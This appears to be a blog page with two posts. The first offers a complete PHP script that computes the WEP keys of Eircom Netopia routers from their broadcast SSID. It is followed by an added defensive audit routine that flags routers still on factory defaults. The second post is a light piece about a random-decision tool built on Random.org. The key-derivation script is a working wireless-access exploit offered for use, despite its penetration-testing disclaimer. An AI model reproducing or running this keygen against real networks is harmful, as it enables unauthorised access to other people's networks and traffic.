
The old Eircom security snafu…

A few years back there was a serious security mishap when a smart chap by the name of Kevin Devine reverse engineered a tool that was used to reset the Netopia brand of routers used by Eircom in Ireland to the factory default settings. This application conveniently showed how the WEP key was essentially generated from the MAC address.

When the details of this algorithm were released, I set forward and wrote a small PHP script that could ascertain the WEP key from the SSID of the network… after accomplishing this task I promptly set about forgetting it and moving on to other things that were equally forgettable… I’ve recently rediscovered the code I wrote and here it is…

 

<?php

/*
EIRWEP.INC.PHP

BACKGROUND:
    EIRWEP.INC.PHP WAS WRITTEN BY STEVEN MOUGHAN FOR THE PHISHBONE.ORG GROUP ON 25TH & 26TH OF JUNE 08.
    IT IS BASED ON DETAILS OF THE HASHING ALGORITHM THAT WERE PUBLISHED BY KEVIN DEVINE. THE ORIGINAL
    DETAILS AND SOURCE CODE OF THE EXPLOIT WERE AVAILABLE AT THE TIME OF WRITING FROM
    HTTP://WEISS.U40.HOSTING.DIGIWEB.IE/NETOPIA/KEYGEN.HTML

    STEVEN MOUGHAN OR HACKDEV.COM CLAIM NO CREDIT FOR THE DISCOVERY OF THIS EXPLOIT, ONLY FOR THIS FILE.

DISCLAIMER:
    THE AUTHOR, HOST OR DISTRIBUTOR OF THIS TOOL WILL ACCEPT NO RESPONSIBILITY FOR MISUSE.
    THIS SOFTWARE IS DISTRIBUTED AS A PENETRATION TESTING TOOL ONLY. IT IS NOT INTENDED FOR
    USE IN ORDER TO GAIN UNAUTHORISED ACCESS INTO ANY NETWORK.

USAGE:
    INCLUDE EIRWEP.INC.PHP INTO ANY OTHER PHP SCRIPT AND CALL THE FUNCTION getKey() WITH THE
    SSID ARGUMENT. THE SSID SHOULD CONTAIN ONLY 8 DIGITS, NO LETTERS, NO SYMBOLS. THE getKey
    FUNCTION WILL RETURN AN ARRAY. THE ARRAY HAS THE FOLLOWING ENTRIES.

    ARRAY['mac'] -> THE MAC ADDRESS OF THE ROUTER
    ARRAY['ser'] -> THE SERIAL OF THE ROUTER
    ARRAY['key'][0-3] -> WEP KEYS 1->4

EXAMPLE:
    <?php require('./eirwep.inc.php'); print_r(getKey('12345678')); ?>
*/

    // Fallback for PHP 4, which has no built-in str_split()
    if(!function_exists('str_split')) {
        function str_split($string, $split_length = 1) {
            $array = explode("\r\n", chunk_split($string, $split_length));
            array_pop($array);
            return $array;
        }
    }

    function getKey($ssid) {
        $digits = array("Zero","One","Two","Three","Four","Five","Six","Seven","Eight","Nine");
        $lyrics[0] = "Although your world wonders me, ";
        $lyrics[1] = "with your superior cackling hen,";
        $lyrics[2] = "Your people I do not understand,";
        $lyrics[3] = "So to you I shall put an end and";
        $lyrics[4] = "You'll never hear surf music aga";
        $lyrics[5] = "Strange beautiful grassy green, ";
        $lyrics[6] = "With your majestic silver seas, ";
        $lyrics[7] = "Your mysterious mountains I wish";

        // The SSID digits are read as an octal number; cast to string so every digit is kept
        $ssid = octdec((string)$ssid);
        // Initialise the result and accumulators (assigning into '' fails on PHP 7.1+)
        $retvar = array();
        $text = '';
        $cipher = '';
        $mac = $ssid ^ 4044;
        // Zero-pad to 6 hex digits so the MAC always splits into six octets
        $tmp = '000fcc' . str_pad(dechex($mac), 6, '0', STR_PAD_LEFT);
        $tmpa = str_split($tmp,2);
        $tmp = "$tmpa[0]:$tmpa[1]:$tmpa[2]:$tmpa[3]:$tmpa[4]:$tmpa[5]";
        $tmp = strtoupper($tmp);
        $retvar['mac'] = $tmp;
        $serial = $mac + 16777216;
        $retvar['ser'] = $serial;
        $chars = str_split((string)$serial);

        // Spell out each of the 8 serial digits as an English word
        for($i=0; $i<8;$i++) {
            $text .= $digits[$chars[$i]];
        }//end for

        // Hash the spelled-out serial with each lyric line and concatenate the digests
        for($i=0;$i<=7;$i++) {
            $appended[$i] = $text . $lyrics[$i];
            $cipher .= sha1($appended[$i]);
        }//end for

        // Each WEP key is 26 hex characters taken from the concatenated digests
        $tmp = str_split($cipher, 26);

        for($i=0; $i<4; $i++) {
            $retvar['key'][$i] = strtoupper($tmp[$i]);
        }

        return $retvar;
    }//end function getKey
?>
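
For the defending side, an added example (not part of the original post or of Kevin Devine's code): an inventory audit that flags routers still on the factory-default SSID, using only the SSID-to-MAC relationship from the script above and never computing a key. The function names and sample rows are constructed for illustration, and it assumes the BSSID seen over the air equals the router MAC the script derives.

```php
<?php
// Added example: flag routers in an inventory that still broadcast the
// factory-default SSID, the only input the key derivation above needs.

// MAC implied by a default SSID, or null when the SSID does not fit the
// pattern (exactly 8 octal digits once other characters are stripped).
function impliedMac(string $ssid): ?string
{
    $digits = preg_replace('/\D/', '', $ssid);
    if (!preg_match('/^[0-7]{8}$/', $digits)) {
        return null;
    }
    $low = octdec($digits) ^ 4044; // same XOR constant as getKey()
    $hex = '000fcc' . str_pad(dechex($low), 6, '0', STR_PAD_LEFT);
    return strtoupper(implode(':', str_split($hex, 2)));
}

// Rows whose BSSID matches the MAC implied by their SSID are still on
// factory settings, so their WEP keys are a function of a broadcast value.
function auditInventory(array $rows): array
{
    $findings = array();
    foreach ($rows as $row) {
        // Normalise the BSSID (assumed formats: colon- or dash-separated hex)
        $bssid = strtoupper(str_replace('-', ':', $row['bssid']));
        if (impliedMac($row['ssid']) === $bssid) {
            $findings[] = $row['ssid'] . ' [' . $bssid . ']: factory-default SSID, '
                . 'WEP key is derivable; set a new random key and move off WEP';
        }
    }
    return $findings;
}

// Constructed sample inventory (not real devices).
$inventory = array(
    array('ssid' => '12345670', 'bssid' => '00:0F:CC:29:C4:74'), // untouched default
    array('ssid' => '12345670', 'bssid' => '00-0f-cc-11-22-33'), // same SSID, other hardware
    array('ssid' => 'HomeNet',  'bssid' => '00:0F:CC:29:C4:74'), // renamed by the owner
);

foreach (auditInventory($inventory) as $line) {
    echo $line, PHP_EOL;
}
```

Only the first row is reported. The renamed network in the third row is not cleared by this check: the keys are computed from the MAC, so a new SSID says nothing about whether the key was changed as well.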

Using the universe to generate numbers…

I’ve often been stuck trying to make a decision, a pretty straightforward thing to do; in fact, I would say I do it often… but sometimes you just can’t decide if it should be pizza or noodles, to work or play, all relatively simple decisions that can often be the most difficult to make.

After a while of going back and forth trying to decide what kind of take out food to eat with my girlfriend (and getting nowhere, I might add), I made a decision to write some very simple software. I took a few moments to populate an array with the options, and generated a random integer using PHP’s rand() function with a limit of 0->count($options) and figured we would just order whatever the program told us to, relieving us of the simple decision that became oh so complicated.

Unfortunately there was a small problem, you see my girlfriend is in fact a girl; and when the program ran it gave us an answer, but alas it wasn’t the answer my girlfriend wanted and we resorted to running the program over and over until eventually it came back with the option that my missus really wanted, but wouldn’t make the call on.

So aside from a few wetware problems, the software was a success. In fact I amended it to make other decisions for me that my feeble mind deemed too important. I wouldn’t rely on it for making any important decisions, but it’s fine for the occasional surprising mental blocks I’ve come to accept as part of my mind’s inner workings.

I played around then on Google, looking for other random decision generators and found quite a few, but then I remembered something from a few years back… Random.org. I had played with it before on a few occasions when I wanted to generate random numbers for various tasks and recalled it having a very simple web-based interface that can be called from within PHP and with that, the idea of Decidinator was born.

Decidinator is a simple PHP script I wrote that allows you to enter a question and up to ten possible answers; it then uses Random.org to generate random numbers that will determine the outcome. If it sounds like overkill now, just wait until you find out how they generate their random numbers…

The Random.org service provides a whole plethora of options for generating random outcomes, entirely based on the background radiation of the universe as a whole. As particles of space dust float around and crash into each other, some will emit electromagnetic pulses as radio waves; as gases get ionized by the sun and other stars, they will also generate radio interference; just think of what all of that noise is when you tune your radio in between the stations and listen to the “static”… They take all of this and use it to generate random numbers.

There you have it, my little script to make little decisions for me as to what to put in my big mouth is now not only a little bit overkill; it’s awesome. The next time you have to make a simple decision of what to eat or what film to watch, why not leave it to chance and Ask the Universe?